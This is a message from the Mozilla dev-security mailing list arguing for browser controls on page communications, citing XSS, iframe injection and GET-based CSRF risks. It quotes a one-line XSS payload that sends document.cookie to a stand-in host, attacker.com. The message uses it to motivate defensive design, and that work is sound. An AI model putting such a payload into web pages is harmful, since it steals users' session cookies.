On Jun 17, 9:25 am, Gervase Markham <[EMAIL PROTECTED]> wrote: > What's the use case for locking down all page communications?
The traditional one: XSS cookie-stealing attacks like this: var image = new Image(); image.src= ’http://attacker.com/log.php?cookie=’ + encodeURIComponent(document.cookie); A more modern one: iframe injections eg: http://www.webpronews.com/topnews/2008/03/28/major-sites-hit-with-iframe-injection-attacks > > It also means that it wouldn't be that useful to prevent cross site > > request forgery (realistically, "safe" operations aren't unless your > > web programmers abide by them, and I would venture that many don't). > I would venture that most do. Doing a web purchase via a GET runs into > problems with e.g. the user doing a Reload. We did some tests in the lab and in a quick check of a few retailers didn't find sites that would allow you to complete web purchases with GET requests, but we found several places (I believe thinkgeek and maple music were some of the targets) that let you add to a cart with GETs, so we can't really claim that GET requests do nothing to change the state of a given web application, even though I believe the specs say they shouldn't. I hadn't been thinking about purchases, though: I was actually thinking in terms of using GET requests to add comments/forum posts to a site, which I have seen, and could be used to make self-propagating web-worms a la Samy, to insert iframe exploits in vulnerable sites, or just to use users' credentials to post spam including links to dangerous sites. _______________________________________________ dev-security mailing list [email protected] https://lists.mozilla.org/listinfo/dev-security
